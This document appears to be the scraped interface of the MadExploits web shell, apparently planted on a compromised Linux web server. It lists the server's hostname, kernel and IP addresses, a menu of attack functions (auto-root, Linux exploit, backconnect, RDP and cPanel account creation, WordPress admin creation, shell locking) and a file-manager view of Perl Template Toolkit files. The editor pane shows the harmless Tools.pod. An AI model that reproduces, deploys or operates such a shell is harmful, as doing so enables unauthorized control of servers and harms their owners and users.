Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 3.141.32.252
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib64 /
perl5 /
vendor_perl /
Template /
[ HOME SHELL ]
Name
Size
Permission
Action
Manual
[ DIR ]
drwxr-xr-x
Namespace
[ DIR ]
drwxr-xr-x
Plugin
[ DIR ]
drwxr-xr-x
Stash
[ DIR ]
drwxr-xr-x
Tools
[ DIR ]
drwxr-xr-x
Tutorial
[ DIR ]
drwxr-xr-x
Base.pm
7.39
KB
-rw-r--r--
Config.pm
13.3
KB
-rw-r--r--
Constants.pm
9.52
KB
-rw-r--r--
Context.pm
52.47
KB
-rw-r--r--
Directive.pm
28.51
KB
-rw-r--r--
Document.pm
16.26
KB
-rw-r--r--
Exception.pm
6.25
KB
-rw-r--r--
FAQ.pod
8.6
KB
-rw-r--r--
Filters.pm
24.62
KB
-rw-r--r--
Grammar.pm
96.53
KB
-rw-r--r--
Iterator.pm
13.43
KB
-rw-r--r--
Manual.pod
2.38
KB
-rw-r--r--
Modules.pod
5.37
KB
-rw-r--r--
Parser.pm
37.27
KB
-rw-r--r--
Plugin.pm
10.45
KB
-rw-r--r--
Plugins.pm
14.83
KB
-rw-r--r--
Provider.pm
46.34
KB
-rw-r--r--
Service.pm
18.13
KB
-rw-r--r--
Stash.pm
29.51
KB
-rw-r--r--
Test.pm
21.41
KB
-rw-r--r--
Toolkit.pod
5.54
KB
-rw-r--r--
Tools.pod
1.49
KB
-rw-r--r--
Tutorial.pod
1.02
KB
-rw-r--r--
VMethods.pm
14.1
KB
-rw-r--r--
View.pm
23.52
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Tools.pod
#============================================================= -*-perl-*- # # Template::Tools # # DESCRIPTION # Index page for documentation about the command line tools # distributed with the Template Toolkit. # # AUTHOR # Andy Wardley <abw@wardley.org> # # COPYRIGHT # Copyright (C) 1996-2007 Andy Wardley. All Rights Reserved. # # This module is free software; you can redistribute it and/or # modify it under the same terms as Perl itself. # #======================================================================== =head1 NAME Template::Tools - Command Line Tools for the Template Toolkit =head1 Template Tools The Template Toolkit includes the following command line tools for processing templates. =head2 tpage The L<tpage|Template::Tools::tpage> script can be used to process a single template using the Template Toolkit. $ tpage --define msg="Hello World" greeting.tt2 Use the C<-h> option to get a summary of options: $ tpage -h See the L<Template::Tools::tpage> documentation for further information and examples of use. =head2 ttree The L<ttree|Template::Tools::ttree> script can be used to process an entire directory of templates. $ ttree --src /path/to/templates --dest /path/to/output Use the C<-h> option to get a summary of options: $ ttree -h See the L<Template::Tools::ttree> documentation for further information and examples of use. =cut # Local Variables: # mode: perl # perl-indent-level: 4 # indent-tabs-mode: nil # End: # # vim: expandtab shiftwidth=4:
Close